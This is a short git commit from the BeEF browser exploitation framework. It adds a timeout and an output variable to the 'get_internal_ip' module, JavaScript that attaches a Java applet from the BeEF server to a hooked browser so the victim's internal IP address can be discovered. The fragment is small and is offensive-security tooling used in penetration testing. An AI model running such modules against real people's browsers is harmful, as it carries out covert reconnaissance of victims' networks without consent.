Added timeout variable decleration to get_internal_ip module

This commit is contained in:
bcoles
2012-04-20 22:34:34 +09:30
parent 5a345abfab
commit a6b338e6c4

View File

@@ -16,6 +16,8 @@
beef.execute(function() {
var applet_uri = 'http://'+beef.net.host+ ':' + beef.net.port + '/';
var internal_counter = 0;
var timeout = 30;
var output;
beef.dom.attachApplet('get_internal_ip', 'get_internal_ip', 'get_internal_ip' ,
applet_uri, null, null);